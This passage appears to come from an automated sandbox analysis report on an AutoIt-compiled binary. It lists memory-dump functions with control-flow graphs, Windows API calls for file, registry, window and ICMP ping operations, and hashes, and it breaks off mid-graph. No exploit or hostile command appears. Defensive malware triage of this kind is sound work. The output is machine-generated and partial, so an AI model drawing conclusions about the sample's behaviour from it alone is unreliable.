                                                                                                                                                                                                                                                                                                        control_flow_graph 369 ff09db-ff0a0b call ff07af 372 ff0a0d-ff0a18 call fdf636 369->372 373 ff0a26-ff0a32 call fe5594 369->373 380 ff0a1a-ff0a21 call fdf649 372->380 378 ff0a4b-ff0a94 call ff071a 373->378 379 ff0a34-ff0a49 call fdf636 call fdf649 373->379 388 ff0a96-ff0a9f 378->388 389 ff0b01-ff0b0a GetFileType 378->389 379->380 390 ff0cfd-ff0d03 380->390 394 ff0ad6-ff0afc GetLastError call fdf613 388->394 395 ff0aa1-ff0aa5 388->395 391 ff0b0c-ff0b3d GetLastError call fdf613 CloseHandle 389->391 392 ff0b53-ff0b56 389->392 391->380 406 ff0b43-ff0b4e call fdf649 391->406 398 ff0b5f-ff0b65 392->398 399 ff0b58-ff0b5d 392->399 394->380 395->394 400 ff0aa7-ff0ad4 call ff071a 395->400 403 ff0b69-ff0bb7 call fe54dd 398->403 404 ff0b67 398->404 399->403 400->389 400->394 411 ff0bb9-ff0bc5 call ff092b 403->411 412 ff0bc7-ff0beb call ff04cd 403->412 404->403 406->380 411->412 418 ff0bef-ff0bf9 call fe8a2e 411->418 419 ff0bfe-ff0c41 412->419 420 ff0bed 412->420 418->390 422 ff0c43-ff0c47 419->422 423 ff0c62-ff0c70 419->423 420->418 422->423 425 ff0c49-ff0c5d 422->425 426 ff0cfb 423->426 427 ff0c76-ff0c7a 423->427 425->423 426->390 427->426 428 ff0c7c-ff0caf CloseHandle call ff071a 427->428 431 ff0ce3-ff0cf7 428->431 432 ff0cb1-ff0cdd GetLastError call fdf613 call fe56a6 428->432 431->426 432->431
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FF071A: CreateFileW.KERNEL32(00000000,00000000,?,00FF0A84,?,?,00000000,?,00FF0A84,00000000,0000000C), ref: 00FF0737
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00FF0AEF
                                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00FF0AF6
                                                                                                                                                                                                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 00FF0B02
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00FF0B0C
                                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00FF0B15
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00FF0B35
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00FF0C7F
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00FF0CB1
                                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00FF0CB8
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                                                        • String ID: H
                                                                                                                                                                                                                                                                                                        • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                                                        • Opcode ID: 040350a7288d9f11cbd5b6d6f08e91c35fbf7806e0d9c6edd6531be3f891deda
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3a396f2c49ea853ca307a5ca4933fb08f11a0e000a558a788cc4f35bea8fbf5f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 040350a7288d9f11cbd5b6d6f08e91c35fbf7806e0d9c6edd6531be3f891deda
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DFA12632A041489FDF29AF68D851BBD7BA1AF06324F14015AF951DF3A2DB399C02EB51
                                                                                                                                                                                                                                                                                                        Function 00FB52A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB5594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00FF4B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00FB55B2
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB5238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FB525A
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00FB53C4
                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FF4BFD
                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FF4C3E
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00FF4C80
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00FF4CE7
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00FF4CF6
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                                                                                        • API String ID: 98802146-2727554177
                                                                                                                                                                                                                                                                                                        • Opcode ID: 83e394c9eea464c4e7a247d209b6c67fff12f1ba98291128c79274045ec45192
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8ddc9311d94ecd0325f21ec5ad56ecac871b35ac951e662e6ed28ad84dc800a4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83e394c9eea464c4e7a247d209b6c67fff12f1ba98291128c79274045ec45192
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86719C715083059BC320EF6AD8819AFBBE8FF98B40B40442EB5C09B264DF7AD949DB51
                                                                                                                                                                                                                                                                                                        Function 00FB34D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00FB34DE
                                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00FB34ED
                                                                                                                                                                                                                                                                                                        • LoadIconW.USER32(00000063), ref: 00FB3503
                                                                                                                                                                                                                                                                                                        • LoadIconW.USER32(000000A4), ref: 00FB3515
                                                                                                                                                                                                                                                                                                        • LoadIconW.USER32(000000A2), ref: 00FB3527
                                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FB353F
                                                                                                                                                                                                                                                                                                        • RegisterClassExW.USER32(?), ref: 00FB3590
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB3624: GetSysColorBrush.USER32(0000000F), ref: 00FB3657
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB3624: RegisterClassExW.USER32(00000030), ref: 00FB3681
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB3624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FB3692
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB3624: InitCommonControlsEx.COMCTL32(?), ref: 00FB36AF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB3624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FB36BF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB3624: LoadIconW.USER32(000000A9), ref: 00FB36D5
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB3624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FB36E4
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                                        • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                                                        • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                                                                        • Opcode ID: 9844a7055e51048c6e6f392387e780b08457f1cad675653119943f6523953f76
                                                                                                                                                                                                                                                                                                        • Instruction ID: cad474c431ecb7c691892b93d046ae15d35255e8c910a3d59297c2cada1747d9
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9844a7055e51048c6e6f392387e780b08457f1cad675653119943f6523953f76
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA214FB8D04358ABDB20DFA5EDA5A9D7FF4FB08750F00801AE684A6284D7BA4544CF90
                                                                                                                                                                                                                                                                                                        Function 01030FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 510 1030fb8-1030fef call fbe6a0 513 1030ff1-1030ffe call fbc98d 510->513 514 103100f-1031021 WSAStartup 510->514 513->514 525 1031000-103100b call fbc98d 513->525 515 1031023-1031031 514->515 516 1031054-1031091 call fcc1f6 call fb8ec0 call fcf9d4 inet_addr gethostbyname 514->516 518 1031033 515->518 519 1031036-1031046 515->519 533 1031093-10310a0 IcmpCreateFile 516->533 534 10310a2-10310b0 516->534 518->519 522 103104b-103104f 519->522 523 1031048 519->523 526 1031249-1031251 522->526 523->522 525->514 533->534 535 10310d3-1031100 call fd017b call fb423c 533->535 536 10310b2 534->536 537 10310b5-10310c5 534->537 546 1031102-1031129 IcmpSendEcho 535->546 547 103112b-1031148 IcmpSendEcho 535->547 536->537 538 10310c7 537->538 539 10310ca-10310ce 537->539 538->539 541 1031240-1031244 call fbbd98 539->541 541->526 548 103114c-103114e 546->548 547->548 549 1031150-1031155 548->549 550 10311ae-10311bc 548->550 553 103115b-1031160 549->553 554 10311f8-103120a call fbe6a0 549->554 551 10311c1-10311c8 550->551 552 10311be 550->552 556 10311e4-10311ed 551->556 552->551 557 1031162-1031167 553->557 558 10311ca-10311d8 553->558 565 1031210 554->565 566 103120c-103120e 554->566 562 10311f2-10311f6 556->562 563 10311ef 556->563 557->550 564 1031169-103116e 557->564 560 10311da 558->560 561 10311dd 558->561 560->561 561->556 567 1031212-1031229 IcmpCloseHandle WSACleanup 562->567 563->562 568 1031193-10311a1 564->568 569 1031170-1031175 564->569 565->567 566->567 567->541 573 103122b-103123d call fd013d call fd0184 567->573 571 10311a3 568->571 572 10311a6-10311ac 568->572 569->558 570 1031177-1031185 569->570 574 1031187 570->574 575 103118a-1031191 570->575 571->572 572->556 573->541 574->575 575->556
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • WSAStartup.WS2_32(00000101,?), ref: 01031019
                                                                                                                                                                                                                                                                                                        • inet_addr.WSOCK32(?), ref: 01031079
                                                                                                                                                                                                                                                                                                        • gethostbyname.WS2_32(?), ref: 01031085
                                                                                                                                                                                                                                                                                                        • IcmpCreateFile.IPHLPAPI ref: 01031093
                                                                                                                                                                                                                                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 01031123
                                                                                                                                                                                                                                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 01031142
                                                                                                                                                                                                                                                                                                        • IcmpCloseHandle.IPHLPAPI(?), ref: 01031216
                                                                                                                                                                                                                                                                                                        • WSACleanup.WSOCK32 ref: 0103121C
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                                                        • String ID: Ping
                                                                                                                                                                                                                                                                                                        • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                                                                                        • Opcode ID: 38acec30906ff1b18359ba082a1e29f45498e900c0e7dd140966111bf408f77a
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9970a08ff34046ba61f3f7059060927557515c0d6463568f9a8129355d3280b9
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38acec30906ff1b18359ba082a1e29f45498e900c0e7dd140966111bf408f77a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1291BF71604241AFD720CF19C888F5ABBE5BF88318F0485A9F5A98B7A2C775ED45CB81
                                                                                                                                                                                                                                                                                                        Function 00FB370F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 580 fb370f-fb3724 581 fb3726-fb3729 580->581 582 fb3784-fb3786 580->582 584 fb372b-fb3732 581->584 585 fb378a 581->585 582->581 583 fb3788 582->583 586 fb376f-fb3777 DefWindowProcW 583->586 589 fb3738-fb373d 584->589 590 fb3804-fb380c PostQuitMessage 584->590 587 ff3df4-ff3e1c call fb2f92 call fcf23c 585->587 588 fb3790-fb3795 585->588 591 fb377d-fb3783 586->591 626 ff3e21-ff3e28 587->626 593 fb37bc-fb37e3 SetTimer RegisterWindowMessageW 588->593 594 fb3797-fb379a 588->594 595 fb3743-fb3747 589->595 596 ff3e61-ff3e75 call 101c8f7 589->596 592 fb37b8-fb37ba 590->592 592->591 593->592 600 fb37e5-fb37f0 CreatePopupMenu 593->600 598 ff3d95-ff3d98 594->598 599 fb37a0-fb37b3 KillTimer call fb3907 call fb59ff 594->599 601 fb380e-fb3818 call fcfcad 595->601 602 fb374d-fb3752 595->602 596->592 621 ff3e7b 596->621 606 ff3d9a-ff3d9e 598->606 607 ff3dd0-ff3def MoveWindow 598->607 599->592 600->592 614 fb381d 601->614 609 fb3758-fb375d 602->609 610 ff3e46-ff3e4d 602->610 615 ff3dbf-ff3dcb SetFocus 606->615 616 ff3da0-ff3da3 606->616 607->592 619 fb3763-fb3769 609->619 620 fb37f2-fb3802 call fb381f 609->620 610->586 618 ff3e53-ff3e5c call 1011423 610->618 614->592 615->592 616->619 622 ff3da9-ff3dba call fb2f92 616->622 618->586 619->586 619->626 620->592 621->586 622->592 626->586 627 ff3e2e-ff3e41 call fb3907 call fb396b 626->627 627->586
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00FB3709,?,?), ref: 00FB3777
                                                                                                                                                                                                                                                                                                        • KillTimer.USER32(?,00000001,?,?,?,?,?,00FB3709,?,?), ref: 00FB37A3
                                                                                                                                                                                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FB37C6
                                                                                                                                                                                                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00FB3709,?,?), ref: 00FB37D1
                                                                                                                                                                                                                                                                                                        • CreatePopupMenu.USER32 ref: 00FB37E5
                                                                                                                                                                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00FB3806
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                                                        • String ID: TaskbarCreated
                                                                                                                                                                                                                                                                                                        • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5069fb3fe5ecb4496a3841edf28ed0ab68d03f5780c572947372ea849799c8cd
                                                                                                                                                                                                                                                                                                        • Instruction ID: 181953097cc05fdc32778bd63ea49dfce6620c40d49dce9563c1d5d5ef840694
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5069fb3fe5ecb4496a3841edf28ed0ab68d03f5780c572947372ea849799c8cd
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A4145F668C244BBDB246A69CD99BFC3AA5FB14310F204114F5C185284EE6ADB04FB62
                                                                                                                                                                                                                                                                                                        Function 00FE90C5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 636 fe90c5-fe90d5 637 fe90ef-fe90f1 636->637 638 fe90d7-fe90ea call fdf636 call fdf649 636->638 640 fe9459-fe9466 call fdf636 call fdf649 637->640 641 fe90f7-fe90fd 637->641 654 fe9471 638->654 659 fe946c call fe2b5c 640->659 641->640 644 fe9103-fe912e 641->644 644->640 647 fe9134-fe913d 644->647 650 fe913f-fe9152 call fdf636 call fdf649 647->650 651 fe9157-fe9159 647->651 650->659 652 fe915f-fe9163 651->652 653 fe9455-fe9457 651->653 652->653 657 fe9169-fe916d 652->657 658 fe9474-fe9479 653->658 654->658 657->650 661 fe916f-fe9186 657->661 659->654 664 fe9188-fe918b 661->664 665 fe91a3-fe91ac 661->665 667 fe918d-fe9193 664->667 668 fe9195-fe919e 664->668 669 fe91ae-fe91c5 call fdf636 call fdf649 call fe2b5c 665->669 670 fe91ca-fe91d4 665->670 667->668 667->669 671 fe923f-fe9259 668->671 702 fe938c 669->702 673 fe91db-fe91dc call fe3b93 670->673 674 fe91d6-fe91d8 670->674 675 fe925f-fe926f 671->675 676 fe932d-fe9336 call fefc1b 671->676 680 fe91e1-fe91f9 call fe2d38 * 2 673->680 674->673 675->676 679 fe9275-fe9277 675->679 689 fe9338-fe934a 676->689 690 fe93a9 676->690 679->676 683 fe927d-fe92a3 679->683 705 fe91fb-fe9211 call fdf649 call fdf636 680->705 706 fe9216-fe923c call fe97a4 680->706 683->676 687 fe92a9-fe92bc 683->687 687->676 692 fe92be-fe92c0 687->692 689->690 695 fe934c-fe935b GetConsoleMode 689->695 694 fe93ad-fe93c5 ReadFile 690->694 692->676 697 fe92c2-fe92ed 692->697 699 fe93c7-fe93cd 694->699 700 fe9421-fe942c GetLastError 694->700 695->690 701 fe935d-fe9361 695->701 697->676 704 fe92ef-fe9302 697->704 699->700 709 fe93cf 699->709 707 fe942e-fe9440 call fdf649 call fdf636 700->707 708 fe9445-fe9448 700->708 701->694 710 fe9363-fe937d ReadConsoleW 701->710 703 fe938f-fe9399 call fe2d38 702->703 703->658 704->676 716 fe9304-fe9306 704->716 705->702 706->671 707->702 713 fe944e-fe9450 708->713 714 fe9385-fe938b call fdf613 708->714 720 fe93d2-fe93e4 709->720 711 fe939e-fe93a7 710->711 712 fe937f GetLastError 710->712 711->720 712->714 713->703 714->702 716->676 723 fe9308-fe9328 716->723 720->703 727 fe93e6-fe93ea 720->727 723->676 731 fe93ec-fe93fc call fe8de1 727->731 732 fe9403-fe940e 727->732 741 fe93ff-fe9401 731->741 734 fe941a-fe941f call fe8c21 732->734 735 fe9410 call fe8f31 732->735 742 fe9415-fe9418 734->742 735->742 741->703 742->741
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: bdac421ffab7791c835a2d202dbfead5b26ebfd7ba621249298d5c95629c619d
                                                                                                                                                                                                                                                                                                        • Instruction ID: 458fddf755365821c46834bc53c7c86189a005fd3ad2db47268f1f6aee35d485
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bdac421ffab7791c835a2d202dbfead5b26ebfd7ba621249298d5c95629c619d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 77C12771D083899FCF21DFAAC840BADBBB5AF09310F184059E555AB3D2C7B98942DB30
                                                                                                                                                                                                                                                                                                        Function 00FCAC3E Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 671COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 744 fcac3e-fcb063 call fb8ec0 call fcbc58 call fbe6a0 751 1008584-1008591 744->751 752 fcb069-fcb073 744->752 755 1008593 751->755 756 1008596-10085a5 751->756 753 fcb079-fcb07e 752->753 754 100896b-1008979 752->754 761 10085b2-10085b4 753->761 762 fcb084-fcb090 call fcb5b6 753->762 759 100897b 754->759 760 100897e 754->760 755->756 757 10085a7 756->757 758 10085aa 756->758 757->758 758->761 759->760 763 1008985-100898e 760->763 767 10085bd 761->767 762->767 769 fcb096-fcb0a3 call fbc98d 762->769 765 1008990 763->765 766 1008993 763->766 765->766 771 100899c-10089eb call fbe6a0 call fcbbbe * 2 766->771 770 10085c7 767->770 777 fcb0ab-fcb0b4 769->777 775 10085cf-10085d2 770->775 803 fcb1e0-fcb1f5 771->803 812 10089f1-1008a03 call fcb5b6 771->812 779 fcb158-fcb16f 775->779 780 10085d8-1008600 call fd4cd3 call fb7ad5 775->780 778 fcb0b8-fcb0d6 call fd4d98 777->778 797 fcb0d8-fcb0e1 778->797 798 fcb0e5 778->798 785 1008954-1008957 779->785 786 fcb175 779->786 823 1008602-1008606 780->823 824 100862d-1008651 call fb7b1a call fbbd98 780->824 790 1008a41-1008a79 call fbe6a0 call fcbbbe 785->790 791 100895d-1008960 785->791 792 fcb17b-fcb17e 786->792 793 10088ff-1008920 call fbe6a0 786->793 790->803 838 1008a7f-1008a91 call fcb5b6 790->838 791->771 794 1008962-1008965 791->794 795 fcb184-fcb187 792->795 796 1008729-1008743 call fcbbbe 792->796 793->803 816 1008926-1008938 call fcb5b6 793->816 794->754 794->803 804 fcb18d-fcb190 795->804 805 10086ca-10086e0 call fb6c03 795->805 834 1008749-100874c 796->834 835 100888f-10088b5 call fbe6a0 796->835 797->778 806 fcb0e3 797->806 798->770 808 fcb0eb-fcb0fc 798->808 818 fcb1fb-fcb20b call fbe6a0 803->818 819 1008ac9-1008acf 803->819 814 1008656-1008659 804->814 815 fcb196-fcb1b8 call fbe6a0 804->815 805->803 841 10086e6-10086fc call fcb5b6 805->841 806->808 808->754 817 fcb102-fcb11c 808->817 843 1008a05-1008a0d 812->843 844 1008a2f-1008a3c call fbc98d 812->844 814->754 831 100865f-1008674 call fb6c03 814->831 815->803 860 fcb1ba-fcb1cc call fcb5b6 815->860 863 1008945 816->863 864 100893a-1008943 call fbc98d 816->864 817->775 830 fcb122-fcb154 call fcbbbe call 